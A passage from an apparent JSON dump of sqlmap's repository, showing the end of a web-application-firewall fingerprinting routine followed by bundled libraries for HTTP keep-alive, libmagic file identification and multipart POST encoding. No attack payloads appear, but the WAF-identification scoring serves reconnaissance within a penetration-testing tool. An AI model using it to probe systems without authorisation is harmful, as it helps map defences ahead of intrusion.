                    counter_n += 1\n                result = int(round(100.0 * counter_y / (counter_y + counter_n)))\n                if SIGNATURES[candidate] in matches:\n                    if result > matches[SIGNATURES[candidate]]:\n                        matches[SIGNATURES[candidate]] = result\n                else:\n                    matches[SIGNATURES[candidate]] = result\n\n            if chained:\n                for _ in list(matches.keys()):\n                    if matches[_] < 90:\n                        del matches[_]\n\n            if not matches:\n                print(colorize(\"[-] blind match: - \"))\n                print(colorize(\"[!] probably chained web protection systems\"))\n            else:\n                matches = [(_[1], _[0]) for _ in matches.items()]\n                matches.sort(reverse=True)\n\n                print(colorize(\"[+] blind match: %s\" % \", \".join(\"'%s' (%d%%)\" % (format_name(matches[i][1]), matches[i][0]) for i in xrange(min(len(matches), MAX_MATCHES) if matches[0][0] != 100 else 1))))\n\n    print()\n\ndef main():\n    if \"--version\" not in sys.argv:\n        print(BANNER)\n\n    parse_args()\n    init()\n    run()\n\nload_data()\n\nif __name__ == \"__main__\":\n    try:\n        main()\n    except KeyboardInterrupt:\n        exit(colorize(\"\\r[x] Ctrl-C pressed\"))\n"
  },
  {
    "path": "sqlmap/thirdparty/keepalive/__init__.py",
    "content": "#!/usr/bin/env python\n#\n# Copyright 2002-2003 Michael D. Stenner\n#\n# This program is free software: you can redistribute it and/or modify it\n# under the terms of the GNU Lesser General Public License as published\n# by the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n#\n\npass\n"
  },
  {
    "path": "sqlmap/thirdparty/keepalive/keepalive.py",
    "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#   This library is free software; you can redistribute it and/or\n#   modify it under the terms of the GNU Lesser General Public\n#   License as published by the Free Software Foundation; either\n#   version 2.1 of the License, or (at your option) any later version.\n#\n#   This library is distributed in the hope that it will be useful,\n#   but WITHOUT ANY WARRANTY; without even the implied warranty of\n#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n#   Lesser General Public License for more details.\n#\n#   You should have received a copy of the GNU Lesser General Public\n#   License along with this library; if not, write to the \n#      Free Software Foundation, Inc., \n#      59 Temple Place, Suite 330, \n#      Boston, MA  02111-1307  USA\n\n# This file was part of urlgrabber, a high-level cross-protocol url-grabber\n# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko\n# Copyright 2015 Sergio Fernández\n\n\"\"\"An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive.\n\n>>> import urllib2\n>>> from keepalive import HTTPHandler\n>>> keepalive_handler = HTTPHandler()\n>>> opener = _urllib.request.build_opener(keepalive_handler)\n>>> _urllib.request.install_opener(opener)\n>>> \n>>> fo = _urllib.request.urlopen('http://www.python.org')\n\nIf a connection to a given host is requested, and all of the existing\nconnections are still in use, another connection will be opened.  If\nthe handler tries to use an existing connection but it fails in some\nway, it will be closed and removed from the pool.\n\nTo remove the handler, simply re-run build_opener with no arguments, and\ninstall that opener.\n\nYou can explicitly close connections by using the close_connection()\nmethod of the returned file-like object (described below) or you can\nuse the handler methods:\n\n  close_connection(host)\n  close_all()\n  open_connections()\n\nNOTE: using the close_connection and close_all methods of the handler\nshould be done with care when using multiple threads.\n  * there is nothing that prevents another thread from creating new\n    connections immediately after connections are closed\n  * no checks are done to prevent in-use connections from being closed\n\n>>> keepalive_handler.close_all()\n\nEXTRA ATTRIBUTES AND METHODS\n\n  Upon a status of 200, the object returned has a few additional\n  attributes and methods, which should not be used if you want to\n  remain consistent with the normal urllib2-returned objects:\n\n    close_connection()  -  close the connection to the host\n    readlines()         -  you know, readlines()\n    status              -  the return status (ie 404)\n    reason              -  english translation of status (ie 'File not found')\n\n  If you want the best of both worlds, use this inside an\n  AttributeError-catching try:\n\n  >>> try: status = fo.status\n  >>> except AttributeError: status = None\n\n  Unfortunately, these are ONLY there if status == 200, so it's not\n  easy to distinguish between non-200 responses.  The reason is that\n  urllib2 tries to do clever things with error codes 301, 302, 401,\n  and 407, and it wraps the object upon return.\n\n  For python versions earlier than 2.4, you can avoid this fancy error\n  handling by setting the module-level global HANDLE_ERRORS to zero.\n  You see, prior to 2.4, it's the HTTP Handler's job to determine what\n  to handle specially, and what to just pass up.  HANDLE_ERRORS == 0\n  means \"pass everything up\".  In python 2.4, however, this job no\n  longer belongs to the HTTP Handler and is now done by a NEW handler,\n  HTTPErrorProcessor.  Here's the bottom line:\n\n    python version < 2.4\n        HANDLE_ERRORS == 1  (default) pass up 200, treat the rest as\n                            errors\n        HANDLE_ERRORS == 0  pass everything up, error processing is\n                            left to the calling code\n    python version >= 2.4\n        HANDLE_ERRORS == 1  pass up 200, treat the rest as errors\n        HANDLE_ERRORS == 0  (default) pass everything up, let the\n                            other handlers (specifically,\n                            HTTPErrorProcessor) decide what to do\n\n  In practice, setting the variable either way makes little difference\n  in python 2.4, so for the most consistent behavior across versions,\n  you probably just want to use the defaults, which will give you\n  exceptions on errors.\n\n\"\"\"\n\nfrom __future__ import print_function\n\ntry:\n    from thirdparty.six.moves import http_client as _http_client\n    from thirdparty.six.moves import range as _range\n    from thirdparty.six.moves import urllib as _urllib\nexcept ImportError:\n    from six.moves import http_client as _http_client\n    from six.moves import range as _range\n    from six.moves import urllib as _urllib\n\nimport socket\nimport threading\n\nDEBUG = None\n\nimport sys\nif sys.version_info < (2, 4): HANDLE_ERRORS = 1\nelse: HANDLE_ERRORS = 0\n\nclass ConnectionManager:\n    \"\"\"\n    The connection manager must be able to:\n      * keep track of all existing\n      \"\"\"\n    def __init__(self):\n        self._lock = threading.Lock()\n        self._hostmap = {} # map hosts to a list of connections\n        self._connmap = {} # map connections to host\n        self._readymap = {} # map connection to ready state\n\n    def add(self, host, connection, ready):\n        self._lock.acquire()\n        try:\n            if host not in self._hostmap: self._hostmap[host] = []\n            self._hostmap[host].append(connection)\n            self._connmap[connection] = host\n            self._readymap[connection] = ready\n        finally:\n            self._lock.release()\n\n    def remove(self, connection):\n        self._lock.acquire()\n        try:\n            try:\n                host = self._connmap[connection]\n            except KeyError:\n                pass\n            else:\n                del self._connmap[connection]\n                del self._readymap[connection]\n                self._hostmap[host].remove(connection)\n                if not self._hostmap[host]: del self._hostmap[host]\n        finally:\n            self._lock.release()\n\n    def set_ready(self, connection, ready):\n        try: self._readymap[connection] = ready\n        except KeyError: pass\n\n    def get_ready_conn(self, host):\n        conn = None\n        try:\n            self._lock.acquire()\n            if host in self._hostmap:\n                for c in self._hostmap[host]:\n                    if self._readymap.get(c):\n                        self._readymap[c] = 0\n                        conn = c\n                        break\n        finally:\n            self._lock.release()\n        return conn\n\n    def get_all(self, host=None):\n        if host:\n            return list(self._hostmap.get(host, []))\n        else:\n            return dict(self._hostmap)\n\nclass KeepAliveHandler:\n    def __init__(self):\n        self._cm = ConnectionManager()\n\n    #### Connection Management\n    def open_connections(self):\n        \"\"\"return a list of connected hosts and the number of connections\n        to each.  [('foo.com:80', 2), ('bar.org', 1)]\"\"\"\n        return [(host, len(li)) for (host, li) in self._cm.get_all().items()]\n\n    def close_connection(self, host):\n        \"\"\"close connection(s) to <host>\n        host is the host:port spec, as in 'www.cnn.com:8080' as passed in.\n        no error occurs if there is no connection to that host.\"\"\"\n        for h in self._cm.get_all(host):\n            self._cm.remove(h)\n            h.close()\n\n    def close_all(self):\n        \"\"\"close all open connections\"\"\"\n        for host, conns in self._cm.get_all().items():\n            for h in conns:\n                self._cm.remove(h)\n                h.close()\n\n    def _request_closed(self, request, host, connection):\n        \"\"\"tells us that this request is now closed and the the\n        connection is ready for another request\"\"\"\n        self._cm.set_ready(connection, 1)\n\n    def _remove_connection(self, host, connection, close=0):\n        if close: connection.close()\n        self._cm.remove(connection)\n\n    #### Transaction Execution\n    def do_open(self, req):\n        host = req.host\n        if not host:\n            raise _urllib.error.URLError('no host given')\n\n        try:\n            h = self._cm.get_ready_conn(host)\n            while h:\n                r = self._reuse_connection(h, req, host)\n\n                # if this response is non-None, then it worked and we're\n                # done.  Break out, skipping the else block.\n                if r: break\n\n                # connection is bad - possibly closed by server\n                # discard it and ask for the next free connection\n                h.close()\n                self._cm.remove(h)\n                h = self._cm.get_ready_conn(host)\n            else:\n                # no (working) free connections were found.  Create a new one.\n                h = self._get_connection(host)\n                if DEBUG: DEBUG.info(\"creating new connection to %s (%d)\",\n                                     host, id(h))\n                self._cm.add(host, h, 0)\n                self._start_transaction(h, req)\n                r = h.getresponse()\n        except (socket.error, _http_client.HTTPException) as err:\n            raise _urllib.error.URLError(err)\n\n        if DEBUG: DEBUG.info(\"STATUS: %s, %s\", r.status, r.reason)\n\n        # if not a persistent connection, don't try to reuse it\n        if r.will_close:\n            if DEBUG: DEBUG.info('server will close connection, discarding')\n            self._cm.remove(h)\n\n        r._handler = self\n        r._host = host\n        r._url = req.get_full_url()\n        r._connection = h\n        r.code = r.status\n        r.headers = r.msg\n        r.msg = r.reason\n\n        if r.status == 200 or not HANDLE_ERRORS:\n            return r\n        else:\n            return self.parent.error('http', req, r,\n                                     r.status, r.msg, r.headers)\n\n    def _reuse_connection(self, h, req, host):\n        \"\"\"start the transaction with a re-used connection\n        return a response object (r) upon success or None on failure.\n        This DOES not close or remove bad connections in cases where\n        it returns.  However, if an unexpected exception occurs, it\n        will close and remove the connection before re-raising.\n        \"\"\"\n        try:\n            self._start_transaction(h, req)\n            r = h.getresponse()\n            # note: just because we got something back doesn't mean it\n            # worked.  We'll check the version below, too.\n        except (socket.error, _http_client.HTTPException):\n            r = None\n        except:\n            # adding this block just in case we've missed\n            # something we will still raise the exception, but\n            # lets try and close the connection and remove it\n            # first.  We previously got into a nasty loop\n            # where an exception was uncaught, and so the\n            # connection stayed open.  On the next try, the\n            # same exception was raised, etc.  The tradeoff is\n            # that it's now possible this call will raise\n            # a DIFFERENT exception\n            if DEBUG: DEBUG.error(\"unexpected exception - closing \" + \\\n                                  \"connection to %s (%d)\", host, id(h))\n            self._cm.remove(h)\n            h.close()\n            raise\n\n        if r is None or r.version == 9:\n            # httplib falls back to assuming HTTP 0.9 if it gets a\n            # bad header back.  This is most likely to happen if\n            # the socket has been closed by the server since we\n            # last used the connection.\n            if DEBUG: DEBUG.info(\"failed to re-use connection to %s (%d)\",\n                                 host, id(h))\n            r = None\n        else:\n            if DEBUG: DEBUG.info(\"re-using connection to %s (%d)\", host, id(h))\n\n        return r\n\n    def _start_transaction(self, h, req):\n        try:\n            if req.data:\n                data = req.data\n                if hasattr(req, 'selector'):\n                    h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header(\"Host\"), skip_accept_encoding=req.has_header(\"Accept-encoding\"))\n                else:\n                    h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header(\"Host\"), skip_accept_encoding=req.has_header(\"Accept-encoding\"))\n                if 'Content-type' not in req.headers:\n                    h.putheader('Content-type',\n                                'application/x-www-form-urlencoded')\n                if 'Content-length' not in req.headers:\n                    h.putheader('Content-length', '%d' % len(data))\n            else:\n                if hasattr(req, 'selector'):\n                    h.putrequest(req.get_method() or 'GET', req.selector, skip_host=req.has_header(\"Host\"), skip_accept_encoding=req.has_header(\"Accept-encoding\"))\n                else:\n                    h.putrequest(req.get_method() or 'GET', req.get_selector(), skip_host=req.has_header(\"Host\"), skip_accept_encoding=req.has_header(\"Accept-encoding\"))\n        except (socket.error, _http_client.HTTPException) as err:\n            raise _urllib.error.URLError(err)\n\n        if 'Connection' not in req.headers:\n            req.headers['Connection'] = 'keep-alive'\n\n        for args in self.parent.addheaders:\n            if args[0] not in req.headers:\n                h.putheader(*args)\n        for k, v in req.headers.items():\n            h.putheader(k, v)\n        h.endheaders()\n        if req.data:\n            h.send(data)\n\n    def _get_connection(self, host):\n        return NotImplementedError\n\nclass HTTPHandler(KeepAliveHandler, _urllib.request.HTTPHandler):\n    def __init__(self):\n        KeepAliveHandler.__init__(self)\n\n    def http_open(self, req):\n        return self.do_open(req)\n\n    def _get_connection(self, host):\n        return HTTPConnection(host)\n\nclass HTTPSHandler(KeepAliveHandler, _urllib.request.HTTPSHandler):\n    def __init__(self, ssl_factory=None):\n        KeepAliveHandler.__init__(self)\n        if not ssl_factory:\n            try:\n                import sslfactory\n                ssl_factory = sslfactory.get_factory()\n            except ImportError:\n                pass\n        self._ssl_factory = ssl_factory\n\n    def https_open(self, req):\n        return self.do_open(req)\n\n    def _get_connection(self, host):\n        try: return self._ssl_factory.get_https_connection(host)\n        except AttributeError: return HTTPSConnection(host)\n\nclass HTTPResponse(_http_client.HTTPResponse):\n    # we need to subclass HTTPResponse in order to\n    # 1) add readline() and readlines() methods\n    # 2) add close_connection() methods\n    # 3) add info() and geturl() methods\n\n    # in order to add readline(), read must be modified to deal with a\n    # buffer.  example: readline must read a buffer and then spit back\n    # one line at a time.  The only real alternative is to read one\n    # BYTE at a time (ick).  Once something has been read, it can't be\n    # put back (ok, maybe it can, but that's even uglier than this),\n    # so if you THEN do a normal read, you must first take stuff from\n    # the buffer.\n\n    # the read method wraps the original to accomodate buffering,\n    # although read() never adds to the buffer.\n    # Both readline and readlines have been stolen with almost no\n    # modification from socket.py\n\n\n    def __init__(self, sock, debuglevel=0, strict=0, method=None):\n        if method: # the httplib in python 2.3 uses the method arg\n            _http_client.HTTPResponse.__init__(self, sock, debuglevel, method)\n        else: # 2.2 doesn't\n            _http_client.HTTPResponse.__init__(self, sock, debuglevel)\n        self.fileno = sock.fileno\n        self.code = None\n        self._method = method\n        self._rbuf = b\"\"\n        self._rbufsize = 8096\n        self._handler = None # inserted by the handler later\n        self._host = None    # (same)\n        self._url = None     # (same)\n        self._connection = None # (same)\n\n    _raw_read = _http_client.HTTPResponse.read\n\n    def close(self):\n        if self.fp:\n            self.fp.close()\n            self.fp = None\n            if self._handler:\n                self._handler._request_closed(self, self._host,\n                                              self._connection)\n\n    # Note: Patch for Python3 (otherwise, connections won't be reusable)\n    def _close_conn(self):\n        self.close()\n\n    def close_connection(self):\n        self._handler._remove_connection(self._host, self._connection, close=1)\n        self.close()\n\n    def info(self):\n        return self.headers\n\n    def geturl(self):\n        return self._url\n\n    def read(self, amt=None):\n        # the _rbuf test is only in this first if for speed.  It's not\n        # logically necessary\n        if self._rbuf and not amt is None:\n            L = len(self._rbuf)\n            if amt > L:\n                amt -= L\n            else:\n                s = self._rbuf[:amt]\n                self._rbuf = self._rbuf[amt:]\n                return s\n\n        s = self._rbuf + self._raw_read(amt)\n        self._rbuf = b\"\"\n        return s\n\n    def readline(self, limit=-1):\n        data = b\"\"\n        i = self._rbuf.find('\\n')\n        while i < 0 and not (0 < limit <= len(self._rbuf)):\n            new = self._raw_read(self._rbufsize)\n            if not new: break\n            i = new.find('\\n')\n            if i >= 0: i = i + len(self._rbuf)\n            self._rbuf = self._rbuf + new\n        if i < 0: i = len(self._rbuf)\n        else: i = i+1\n        if 0 <= limit < len(self._rbuf): i = limit\n        data, self._rbuf = self._rbuf[:i], self._rbuf[i:]\n        return data\n\n    def readlines(self, sizehint = 0):\n        total = 0\n        list = []\n        while 1:\n            line = self.readline()\n            if not line: break\n            list.append(line)\n            total += len(line)\n            if sizehint and total >= sizehint:\n                break\n        return list\n\n\nclass HTTPConnection(_http_client.HTTPConnection):\n    # use the modified response class\n    response_class = HTTPResponse\n\nclass HTTPSConnection(_http_client.HTTPSConnection):\n    response_class = HTTPResponse\n\n#########################################################################\n#####   TEST FUNCTIONS\n#########################################################################\n\ndef error_handler(url):\n    global HANDLE_ERRORS\n    orig = HANDLE_ERRORS\n    keepalive_handler = HTTPHandler()\n    opener = _urllib.request.build_opener(keepalive_handler)\n    _urllib.request.install_opener(opener)\n    pos = {0: 'off', 1: 'on'}\n    for i in (0, 1):\n        print(\"  fancy error handling %s (HANDLE_ERRORS = %i)\" % (pos[i], i))\n        HANDLE_ERRORS = i\n        try:\n            fo = _urllib.request.urlopen(url)\n            foo = fo.read()\n            fo.close()\n            try: status, reason = fo.status, fo.reason\n            except AttributeError: status, reason = None, None\n        except IOError as e:\n            print(\"  EXCEPTION: %s\" % e)\n            raise\n        else:\n            print(\"  status = %s, reason = %s\" % (status, reason))\n    HANDLE_ERRORS = orig\n    hosts = keepalive_handler.open_connections()\n    print(\"open connections:\", hosts)\n    keepalive_handler.close_all()\n\ndef continuity(url):\n    from hashlib import md5\n    format = '%25s: %s'\n\n    # first fetch the file with the normal http handler\n    opener = _urllib.request.build_opener()\n    _urllib.request.install_opener(opener)\n    fo = _urllib.request.urlopen(url)\n    foo = fo.read()\n    fo.close()\n    m = md5(foo)\n    print(format % ('normal urllib', m.hexdigest()))\n\n    # now install the keepalive handler and try again\n    opener = _urllib.request.build_opener(HTTPHandler())\n    _urllib.request.install_opener(opener)\n\n    fo = _urllib.request.urlopen(url)\n    foo = fo.read()\n    fo.close()\n    m = md5(foo)\n    print(format % ('keepalive read', m.hexdigest()))\n\n    fo = _urllib.request.urlopen(url)\n    foo = ''\n    while 1:\n        f = fo.readline()\n        if f: foo = foo + f\n        else: break\n    fo.close()\n    m = md5(foo)\n    print(format % ('keepalive readline', m.hexdigest()))\n\ndef comp(N, url):\n    print('  making %i connections to:\\n  %s' % (N, url))\n\n    sys.stdout.write('  first using the normal urllib handlers')\n    # first use normal opener\n    opener = _urllib.request.build_opener()\n    _urllib.request.install_opener(opener)\n    t1 = fetch(N, url)\n    print('  TIME: %.3f s' % t1)\n\n    sys.stdout.write('  now using the keepalive handler       ')\n    # now install the keepalive handler and try again\n    opener = _urllib.request.build_opener(HTTPHandler())\n    _urllib.request.install_opener(opener)\n    t2 = fetch(N, url)\n    print('  TIME: %.3f s' % t2)\n    print('  improvement factor: %.2f' % (t1/t2, ))\n\ndef fetch(N, url, delay=0):\n    import time\n    lens = []\n    starttime = time.time()\n    for i in _range(N):\n        if delay and i > 0: time.sleep(delay)\n        fo = _urllib.request.urlopen(url)\n        foo = fo.read()\n        fo.close()\n        lens.append(len(foo))\n    diff = time.time() - starttime\n\n    j = 0\n    for i in lens[1:]:\n        j = j + 1\n        if not i == lens[0]:\n            print(\"WARNING: inconsistent length on read %i: %i\" % (j, i))\n\n    return diff\n\ndef test_timeout(url):\n    global DEBUG\n    dbbackup = DEBUG\n    class FakeLogger:\n        def debug(self, msg, *args): print(msg % args)\n        info = warning = error = debug\n    DEBUG = FakeLogger()\n    print(\"  fetching the file to establish a connection\")\n    fo = _urllib.request.urlopen(url)\n    data1 = fo.read()\n    fo.close()\n\n    i = 20\n    print(\"  waiting %i seconds for the server to close the connection\" % i)\n    while i > 0:\n        sys.stdout.write('\\r  %2i' % i)\n        sys.stdout.flush()\n        time.sleep(1)\n        i -= 1\n    sys.stderr.write('\\r')\n\n    print(\"  fetching the file a second time\")\n    fo = _urllib.request.urlopen(url)\n    data2 = fo.read()\n    fo.close()\n\n    if data1 == data2:\n        print('  data are identical')\n    else:\n        print('  ERROR: DATA DIFFER')\n\n    DEBUG = dbbackup\n\n\ndef test(url, N=10):\n    print(\"checking error hander (do this on a non-200)\")\n    try: error_handler(url)\n    except IOError as e:\n        print(\"exiting - exception will prevent further tests\")\n        sys.exit()\n    print()\n    print(\"performing continuity test (making sure stuff isn't corrupted)\")\n    continuity(url)\n    print()\n    print(\"performing speed comparison\")\n    comp(N, url)\n    print()\n    print(\"performing dropped-connection check\")\n    test_timeout(url)\n\nif __name__ == '__main__':\n    import time\n    import sys\n    try:\n        N = int(sys.argv[1])\n        url = sys.argv[2]\n    except:\n        print(\"%s <integer> <url>\" % sys.argv[0])\n    else:\n        test(url, N)\n"
  },
  {
    "path": "sqlmap/thirdparty/magic/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/magic/magic.py",
    "content": "\"\"\"\nmagic is a wrapper around the libmagic file identification library.\n\nUsage:\n\n>>> import magic\n>>> magic.from_file(\"testdata/test.pdf\")\n'PDF document, version 1.2'\n>>> magic.from_file(\"testdata/test.pdf\", mime=True)\n'application/pdf'\n>>> magic.from_buffer(open(\"testdata/test.pdf\").read(1024))\n'PDF document, version 1.2'\n>>>\n\n\"\"\"\n\nimport sys\nimport os.path\n\nclass MagicException(Exception):\n    pass\n\nclass Magic:\n    \"\"\"\n    Magic is a wrapper around the libmagic C library.\n    \"\"\"\n\n    def __init__(self, mime=False, magic_file=None, mime_encoding=False):\n        \"\"\"\n        Create a new libmagic wrapper.\n\n        mime - if True, mimetypes are returned instead of textual descriptions\n        mime_encoding - if True, codec is returned\n        magic_file - use a mime database other than the system default\n        \"\"\"\n\n        flags = MAGIC_NONE\n        if mime:\n            flags |= MAGIC_MIME\n        elif mime_encoding:\n            flags |= MAGIC_MIME_ENCODING\n\n        self.cookie = magic_open(flags)\n\n        magic_load(self.cookie, magic_file)\n\n\n    def from_buffer(self, buf):\n        \"\"\"\n        Identify the contents of `buf`\n        \"\"\"\n\n        return magic_buffer(self.cookie, buf)\n\n    def from_file(self, filename):\n        \"\"\"\n        Identify the contents of file `filename`\n        raises IOError if the file does not exist\n        \"\"\"\n\n        if not os.path.exists(filename):\n            raise IOError(\"File does not exist: \" + filename)\n\n        return magic_file(self.cookie, filename)\n\n    def __del__(self):\n        # during shutdown magic_close may have been cleared already\n        if self.cookie and magic_close:\n            magic_close(self.cookie)\n            self.cookie = None\n\n_magic_mime = None\n_magic = None\n\ndef _get_magic_mime():\n    global _magic_mime\n    if not _magic_mime:\n        _magic_mime = Magic(mime=True)\n    return _magic_mime\n\ndef _get_magic():\n    global _magic\n    if not _magic:\n        _magic = Magic()\n    return _magic\n\ndef _get_magic_type(mime):\n    if mime:\n        return _get_magic_mime()\n    else:\n        return _get_magic()\n\ndef from_file(filename, mime=False):\n    m = _get_magic_type(mime)\n    return m.from_file(filename)\n\ndef from_buffer(buffer, mime=False):\n    m = _get_magic_type(mime)\n    return m.from_buffer(buffer)\n\ntry:\n    libmagic = None\n\n    import ctypes\n    import ctypes.util\n\n    from ctypes import c_char_p, c_int, c_size_t, c_void_p\n\n    # Let's try to find magic or magic1\n    dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1')\n\n    # This is necessary because find_library returns None if it doesn't find the library\n    if dll:\n        try:\n            libmagic = ctypes.CDLL(dll)\n        except WindowsError:\n            pass\n\n    if not libmagic or not libmagic._name:\n        platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib',\n                                      '/usr/local/lib/libmagic.dylib',\n                                      '/usr/local/Cellar/libmagic/5.10/lib/libmagic.dylib'],\n                           'win32':  ['magic1.dll']}\n        for dll in platform_to_lib.get(sys.platform, []):\n            try:\n                libmagic = ctypes.CDLL(dll)\n            except OSError:\n                pass\n\n    if not libmagic or not libmagic._name:\n        # It is better to raise an ImportError since we are importing magic module\n        raise ImportError('failed to find libmagic.  Check your installation')\n\n    magic_t = ctypes.c_void_p\n\n    def errorcheck(result, func, args):\n        err = magic_error(args[0])\n        if err is not None:\n            raise MagicException(err)\n        else:\n            return result\n\n    def coerce_filename(filename):\n        if filename is None:\n            return None\n        return filename.encode(sys.getfilesystemencoding())\n\n    magic_open = libmagic.magic_open\n    magic_open.restype = magic_t\n    magic_open.argtypes = [c_int]\n\n    magic_close = libmagic.magic_close\n    magic_close.restype = None\n    magic_close.argtypes = [magic_t]\n\n    magic_error = libmagic.magic_error\n    magic_error.restype = c_char_p\n    magic_error.argtypes = [magic_t]\n\n    magic_errno = libmagic.magic_errno\n    magic_errno.restype = c_int\n    magic_errno.argtypes = [magic_t]\n\n    _magic_file = libmagic.magic_file\n    _magic_file.restype = c_char_p\n    _magic_file.argtypes = [magic_t, c_char_p]\n    _magic_file.errcheck = errorcheck\n\n    def magic_file(cookie, filename):\n        return _magic_file(cookie, coerce_filename(filename))\n\n    _magic_buffer = libmagic.magic_buffer\n    _magic_buffer.restype = c_char_p\n    _magic_buffer.argtypes = [magic_t, c_void_p, c_size_t]\n    _magic_buffer.errcheck = errorcheck\n\n\n    def magic_buffer(cookie, buf):\n        return _magic_buffer(cookie, buf, len(buf))\n\n    _magic_load = libmagic.magic_load\n    _magic_load.restype = c_int\n    _magic_load.argtypes = [magic_t, c_char_p]\n    _magic_load.errcheck = errorcheck\n\n    def magic_load(cookie, filename):\n        return _magic_load(cookie, coerce_filename(filename))\n\n    magic_setflags = libmagic.magic_setflags\n    magic_setflags.restype = c_int\n    magic_setflags.argtypes = [magic_t, c_int]\n\n    magic_check = libmagic.magic_check\n    magic_check.restype = c_int\n    magic_check.argtypes = [magic_t, c_char_p]\n\n    magic_compile = libmagic.magic_compile\n    magic_compile.restype = c_int\n    magic_compile.argtypes = [magic_t, c_char_p]\n\nexcept (ImportError, OSError):\n    from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE\n\nMAGIC_NONE = 0x000000 # No flags\nMAGIC_DEBUG = 0x000001 # Turn on debugging\nMAGIC_SYMLINK = 0x000002 # Follow symlinks\nMAGIC_COMPRESS = 0x000004 # Check inside compressed files\nMAGIC_DEVICES = 0x000008 # Look at the contents of devices\nMAGIC_MIME = 0x000010 # Return a mime string\nMAGIC_MIME_ENCODING = 0x000400 # Return the MIME encoding\nMAGIC_CONTINUE = 0x000020 # Return all matches\nMAGIC_CHECK = 0x000040 # Print warnings to stderr\nMAGIC_PRESERVE_ATIME = 0x000080 # Restore access time on exit\nMAGIC_RAW = 0x000100 # Don't translate unprintable chars\nMAGIC_ERROR = 0x000200 # Handle ENOENT etc as real errors\nMAGIC_NO_CHECK_COMPRESS = 0x001000 # Don't check for compressed files\nMAGIC_NO_CHECK_TAR = 0x002000 # Don't check for tar files\nMAGIC_NO_CHECK_SOFT = 0x004000 # Don't check magic entries\nMAGIC_NO_CHECK_APPTYPE = 0x008000 # Don't check application type\nMAGIC_NO_CHECK_ELF = 0x010000 # Don't check for elf details\nMAGIC_NO_CHECK_ASCII = 0x020000 # Don't check for ascii files\nMAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff\nMAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran\nMAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens\nMAGIC_UNKNOWN_FILETYPE = b\"unknown\"\n"
  },
  {
    "path": "sqlmap/thirdparty/multipart/__init__.py",
    "content": ""
  },
  {
    "path": "sqlmap/thirdparty/multipart/multipartpost.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\n02/2006 Will Holcomb <wholcomb@gmail.com>\n\nReference: http://odin.himinbi.org/MultipartPostHandler.py\n\nThis library is free software; you can redistribute it and/or\nmodify it under the terms of the GNU Lesser General Public\nLicense as published by the Free Software Foundation; either\nversion 2.1 of the License, or (at your option) any later version.\n\nThis library is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\nLesser General Public License for more details.\n\nYou should have received a copy of the GNU Lesser General Public\nLicense along with this library; if not, write to the Free Software\nFoundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA\n\"\"\"\n\nimport io\nimport mimetypes\nimport os\nimport re\nimport stat\nimport sys\n\nfrom lib.core.compat import choose_boundary\nfrom lib.core.convert import getBytes\nfrom lib.core.exception import SqlmapDataException\nfrom thirdparty.six.moves import urllib as _urllib\n\n# Controls how sequences are uncoded. If true, elements may be given\n# multiple values by assigning a sequence.\ndoseq = 1\n\n\nclass MultipartPostHandler(_urllib.request.BaseHandler):\n    handler_order = _urllib.request.HTTPHandler.handler_order - 10 # needs to run first\n\n    def http_request(self, request):\n        data = request.data\n\n        if isinstance(data, dict):\n            v_files = []\n            v_vars = []\n\n            try:\n                for(key, value) in data.items():\n                    if hasattr(value, \"fileno\") or hasattr(value, \"file\") or isinstance(value, io.IOBase):\n                        v_files.append((key, value))\n                    else:\n                        v_vars.append((key, value))\n            except TypeError:\n                systype, value, traceback = sys.exc_info()\n                raise SqlmapDataException(\"not a valid non-string sequence or mapping object '%s'\" % traceback)\n\n            if len(v_files) == 0:\n                data = _urllib.parse.urlencode(v_vars, doseq)\n            else:\n                boundary, data = self.multipart_encode(v_vars, v_files)\n                contenttype = \"multipart/form-data; boundary=%s\" % boundary\n                #if (request.has_header(\"Content-Type\") and request.get_header(\"Content-Type\").find(\"multipart/form-data\") != 0):\n                #    print \"Replacing %s with %s\" % (request.get_header(\"content-type\"), \"multipart/form-data\")\n                request.add_unredirected_header(\"Content-Type\", contenttype)\n\n            request.data = data\n\n        # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235\n        if request.data:\n            for match in re.finditer(b\"(?i)\\\\s*-{20,}\\\\w+(\\\\s+Content-Disposition[^\\\\n]+\\\\s+|\\\\-\\\\-\\\\s*)\", request.data):\n                part = match.group(0)\n                if b'\\r' not in part:\n                    request.data = request.data.replace(part, part.replace(b'\\n', b\"\\r\\n\"))\n\n        return request\n\n    def multipart_encode(self, vars, files, boundary=None, buf=None):\n        if boundary is None:\n            boundary = choose_boundary()\n\n        if buf is None:\n            buf = b\"\"\n\n        for (key, value) in vars:\n            if key is not None and value is not None:\n                buf += b\"--%s\\r\\n\" % getBytes(boundary)\n                buf += b\"Content-Disposition: form-data; name=\\\"%s\\\"\" % getBytes(key)\n                buf += b\"\\r\\n\\r\\n\" + getBytes(value) + b\"\\r\\n\"\n\n        for (key, fd) in files:\n            file_size = fd.len if hasattr(fd, \"len\") else os.fstat(fd.fileno())[stat.ST_SIZE]\n            filename = fd.name.split(\"/\")[-1] if \"/\" in fd.name else fd.name.split(\"\\\\\")[-1]\n            try:\n                contenttype = 